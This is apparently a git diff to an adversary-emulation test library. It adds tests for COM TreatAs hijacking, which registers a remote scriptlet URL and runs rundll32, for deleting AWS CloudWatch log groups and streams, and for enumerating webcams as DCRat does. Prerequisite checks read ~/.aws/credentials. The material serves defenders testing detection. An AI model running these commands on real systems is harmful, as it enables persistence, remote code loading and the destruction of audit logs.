+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f
+
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+
+ rundll32.exe -sta "AtomicTest"
+
+ cleanup_command: |-
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+ name: powershell
diff --git a/atomics/T1546.015/src/TreatAs.sct b/atomics/T1546.015/src/TreatAs.sct
new file mode 100644
index 00000000..c5826f02
--- /dev/null
+++ b/atomics/T1546.015/src/TreatAs.sct
@@ -0,0 +1,22 @@
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1562.008/T1562.008.md
index 869b1c83..425b5059 100644
--- a/atomics/T1562.008/T1562.008.md
+++ b/atomics/T1562.008/T1562.008.md
@@ -14,6 +14,10 @@ Cloud environments allow for collection and analysis of audit and application lo
- [Atomic Test #4 - Disable CloudTrail Logging Through Event Selectors via Stratus](#atomic-test-4---disable-cloudtrail-logging-through-event-selectors-via-stratus)
+- [Atomic Test #5 - AWS CloudWatch Log Group Deletes](#atomic-test-5---aws-cloudwatch-log-group-deletes)
+
+- [Atomic Test #6 - AWS CloudWatch Log Stream Deletes](#atomic-test-6---aws-cloudwatch-log-stream-deletes)
+
@@ -261,4 +265,109 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws
+
+
+
+## Atomic Test #5 - AWS CloudWatch Log Group Deletes
+Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by
+deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 89422c87-b57b-4a04-a8ca-802bb9d06121
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cloudwatch_log_group_name | Name of the cloudWatch log group | String | log-test|
+| region | Name of the region | String | us-east-1|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Created ***"
+aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Deleted ***"
+```
+
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - AWS CloudWatch Log Stream Deletes
+Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by
+deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 33ca84bc-4259-4943-bd36-4655dc420932
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cloudwatch_log_group_name | Name of the cloudWatch log group | String | test-logs|
+| cloudwatch_log_stream_name | Name of the cloudWatch log stream | String | 20150601|
+| region | Name of the region | String | us-west-2|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Created ***"
+aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+echo "*** Log Stream Created ***"
+aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+echo "*** Log Stream Deleted ***"
+aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Deleted ***"
+```
+
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index e029bfb7..078f6b57 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -318,6 +318,38 @@ atomic_tests:
name: sh
elevation_required: false
- name: AWS - CloudWatch Log Stream Deletes
+ auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
+ description: |
+ Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by
+ deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ cloudwatch_log_group_name:
+ description: Name of the cloudWatch log group
+ type: String
+ default: "log-test"
+ region:
+ description: Name of the region
+ type: String
+ default: "us-east-1"
+ dependencies:
+ - description: |
+ Check if ~/.aws/credentials file has a default stanza is configured
+ prereq_command: |
+ cat ~/.aws/credentials | grep "default"
+ get_prereq_command: |
+ echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+ executor:
+ command: |
+ aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Created ***"
+ aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Deleted ***"
+ cleanup_command:
+ name: sh
+ elevation_required: false
+- name: AWS CloudWatch Log Stream Deletes
auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
description: |
Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by
diff --git a/atomics/T1592.001/T1592.001.md b/atomics/T1592.001/T1592.001.md
new file mode 100644
index 00000000..666f2943
--- /dev/null
+++ b/atomics/T1592.001/T1592.001.md
@@ -0,0 +1,26 @@
+# T1592.001 - Gather Victim Host Information: Hardware
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1592/001/)
+Adversaries may use powershell script to gather information about the system, configuration, and even mounted hardware on the target host.
+
+ Dark Crystal Rat use several technique to gather hardware information of the compromised host like gathering the microphone, CPU, GPU, camera and many as part of its data collection and backdoor capabilities.
+
+
+## Atomic Tests
+
+- [Atomic Test #1 - Query Registry](#atomic-test-1---Enumerate PlugNPlay Camera)
+
+
+
+
+## Atomic Test #1 - Query Registry
+Enumerate PlugNPlay Camera.
+Upon successful execution, powershell.exe will perform queries to plugnplay camera device mounted on the host.
+References:
+
+https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor
+
+https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** 08a04133-3f2a-4eb0-bdd8-2aa513d2fb60
diff --git a/atomics/T1592.001/T1592.001.yml b/atomics/T1592.001/T1592.001.yml
new file mode 100644
index 00000000..dcd9be43
--- /dev/null
+++ b/atomics/T1592.001/T1592.001.yml
@@ -0,0 +1,15 @@
+attack_technique: T1592.001
+display_name: 'Gather Victim Host Information: Hardware'
+atomic_tests:
+- name: Enumerate PlugNPlay Camera
+ auto_generated_guid: d430bf85-b656-40e7-b238-42db01df0183
+ description: |
+ Enumerate PlugNPlay Camera using powershell commandlet. this technique was seen in dcrat malware backdoor capabilities where it enumerate the camera info mounted on the compromised host.
+ reference: https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Get-CimInstance -Query "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')"
+ name: powershell
+ elevation_required: true
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 7c51f4fd..98748362 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -1097,3 +1097,9 @@ df81db1b-066c-4802-9bc8-b6d030c3ba8e
ae9b2e3e-efa1-4483-86e2-fae529ab9fb6
a27418de-bdce-4ebd-b655-38f11142bf0c
1e40bb1d-195e-401e-a86b-c192f55e005c
+33eacead-f117-4863-8eb0-5c6304fbfaa9
+3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+57ba4ce9-ee7a-4f27-9928-3c70c489b59d
+97116a3f-efac-4b26-8336-b9cb18c45188
+89422c87-b57b-4a04-a8ca-802bb9d06121
+33ca84bc-4259-4943-bd36-4655dc420932